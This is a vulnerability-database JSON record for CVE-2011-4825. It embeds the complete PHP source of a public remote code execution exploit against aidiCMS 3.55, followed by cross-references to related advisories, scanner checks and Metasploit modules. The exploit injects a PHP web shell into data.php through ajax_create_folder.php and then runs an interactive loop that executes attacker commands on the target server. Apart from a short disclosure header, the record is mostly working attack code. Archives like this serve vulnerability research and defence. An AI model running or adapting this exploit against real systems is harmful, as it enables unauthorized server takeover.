{"published": "2011-11-05T00:00:00", "id": "EDB-ID:18085", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "c2d7f5310fda413cfd99aa66bbb79e2624133abd4f1385d59138f9ae805a5c48", "description": "aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/18085/", "lastseen": "2016-02-02T09:09:08", "edition": 1, "title": "aidiCMS 3.55 - ajax_create_folder.php Remote Code Execution", "osvdbidlist": ["76928"], "modified": "2011-11-05T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4825"], "sourceHref": "https://www.exploit-db.com/download/18085/", "references": [], "reporter": "EgiX", "sourceData": "<?php\r\n\r\n/*\r\n --------------------------------------------------------------------\r\n aidiCMS v3.55 (ajax_create_folder.php) Remote Code Execution Exploit\r\n --------------------------------------------------------------------\r\n \r\n author............: Egidio Romano aka EgiX\r\n mail..............: n0b0d13s[at]gmail[dot]com\r\n software link.....: http://code.google.com/p/aidicms/\r\n \r\n +-------------------------------------------------------------------------+\r\n | This proof of concept code was written for educational purpose only. |\r\n | Use it at your own risk. Author will be not responsible for any damage. |\r\n +-------------------------------------------------------------------------+\r\n \r\n [-] Vulnerability overview:\r\n \r\n aidiCMS v3.55 is affected by the vulnerability that I reported to http://www.exploit-db.com/exploits/18075/\r\n \r\n [-] Disclosure timeline:\r\n \r\n [23/10/2011] - Vulnerability discovered\r\n [24/10/2011] - Issue reported to http://code.google.com/p/aidicms/issues/detail?id=3\r\n [26/10/2011] - Project members contacted via e-mail\r\n [04/11/2011] - Still no response received\r\n [05/11/2011] - Public disclosure\r\n\r\n*/\r\n\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\"default_socket_timeout\", 5);\r\n\r\nfunction http_send($host, $packet)\r\n{\r\n if (!($sock = fsockopen($host, 80)))\r\n die( \"\\n[-] No response from {$host}:80\\n\");\r\n\r\n fwrite($sock, $packet);\r\n return stream_get_contents($sock);\r\n}\r\n\r\nprint \"\\n+-----------------------------------------------------+\";\r\nprint \"\\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |\";\r\nprint \"\\n+-----------------------------------------------------+\\n\";\r\n\r\nif ($argc < 3)\r\n{\r\n print \"\\nUsage......: php $argv[0] <host> <path>\\n\";\r\n print \"\\nExample....: php $argv[0] localhost /\";\r\n print \"\\nExample....: php $argv[0] localhost /aidicms/\\n\";\r\n die();\r\n}\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n\r\n$payload = \"foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\\$_SERVER[HTTP_CMD]));die; ?>\";\r\n$packet = \"POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Content-Length: \".strlen($payload).\"\\r\\n\";\r\n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n{$payload}\";\r\n\r\nhttp_send($host, $packet);\r\n\r\n$packet = \"GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\\r\\n\";\r\n$packet .= \"Host: {$host}\\r\\n\";\r\n$packet .= \"Cmd: %s\\r\\n\";\r\n$packet .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\nwhile(1)\r\n{\r\n print \"\\naidicms-shell# \";\r\n if (($cmd = trim(fgets(STDIN))) == \"exit\") break;\r\n preg_match(\"/_code_(.*)/s\", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?\r\n print $m[1] : die(\"\\n[-] Exploit failed!\\n\");\r\n}\r\n\r\n?>", "objectVersion": "1.0"}

{"result": {"cve": [{"id": "CVE-2011-4825", "type": "cve", "title": "CVE-2011-4825", "description": "Static code injection vulnerability in inc/function.base.php in Ajax File and Image Manager before 1.1, as used in tinymce before 1.4.2, phpMyFAQ 2.6 before 2.6.19 and 2.7 before 2.7.1, and possibly other products, allows remote attackers to inject arbitrary PHP code into data.php via crafted parameters.", "published": "2011-12-14T22:57:34", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4825", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-09-03T15:58:08"}], "exploitdb": [{"id": "EDB-ID:18975", "type": "exploitdb", "title": "Log1 CMS writeInfo PHP Code Injection", "description": "Log1 CMS writeInfo() PHP Code Injection. CVE-2011-4825. Webapps exploit for php platform", "published": "2012-06-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18975/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T10:49:07"}, {"id": "EDB-ID:18083", "type": "exploitdb", "title": "Zenphoto <= 1.4.1.4 - ajax_create_folder.php Remote Code Execution", "description": "Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18083/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:08:51"}, {"id": "EDB-ID:18151", "type": "exploitdb", "title": "Log1CMS 2.0 - ajax_create_folder.php Remote Code Execution", "description": "Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18151/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:15:52"}, {"id": "EDB-ID:18075", "type": "exploitdb", "title": "Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability", "description": "Ajax File and Image Manager 1.0 Final - Remote Code Execution Vulnerability. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18075/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:07:44"}, {"id": "EDB-ID:18084", "type": "exploitdb", "title": "phpMyFAQ <= 2.7.0 ajax_create_folder.php Remote Code Execution", "description": "phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution. CVE-2011-4825. Webapps exploit for php platform", "published": "2011-11-05T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/18084/", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-02-02T09:08:59"}], "dsquare": [{"id": "E-150", "type": "dsquare", "title": "Log1 CMS 2.0 RCE", "description": "Remote command execution vulnerability in Log1 CMS ajax_create_folder.php\n\nVulnerability Type: Remote Command Execution", "published": "2012-06-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2011-4825"], "lastseen": "2017-09-26T15:33:26"}, {"id": "E-129", "type": "dsquare", "title": "phpMyFAQ 2.7.0 RCE", "description": "Remote command execution vulnerability in phpMyFAQ ajax_create_folder.php\n\nVulnerability Type: Remote Command Execution", "published": "2012-04-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2011-4825"], "lastseen": "2017-09-26T15:33:26"}], "packetstorm": [{"id": "PACKETSTORM:113226", "type": "packetstorm", "title": "Log1 CMS writeInfo() PHP Code Injection", "description": "", "published": "2012-06-03T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/113226/Log1-CMS-writeInfo-PHP-Code-Injection.html", "cvelist": ["CVE-2011-4825"], "lastseen": "2016-12-05T22:20:36"}], "openvas": [{"id": "OPENVAS:1361412562310103334", "type": "openvas", "title": "Ajax File and Image Manager 'data.php' PHP Code Injection Vulnerability", "description": "Ajax File and Image Manager is prone to a remote PHP code-injection\n vulnerability.", "published": "2011-11-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103334", "cvelist": ["CVE-2011-4825"], "lastseen": "2017-07-02T21:13:41"}, {"id": "OPENVAS:1361412562310103496", "type": "openvas", "title": "Log1 CMS 'data.php' PHP Code Injection Vulnerability", "description": "Log1 CMS is prone to a remote PHP code-injection vulnerability.", "published": "2012-06-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103496", "cvelist": ["CVE-2011-4825"], "lastseen": "2017-07-02T21:10:36"}], "metasploit": [{"id": "MSF:EXPLOIT/MULTI/HTTP/LOG1CMS_AJAX_CREATE_FOLDER", "type": "metasploit", "title": "Log1 CMS writeInfo() PHP Code Injection", "description": "This module exploits the \"Ajax File and Image Manager\" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution.", "published": "2012-06-02T06:51:20", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2011-4825"], "lastseen": "2018-05-11T21:20:33"}]}}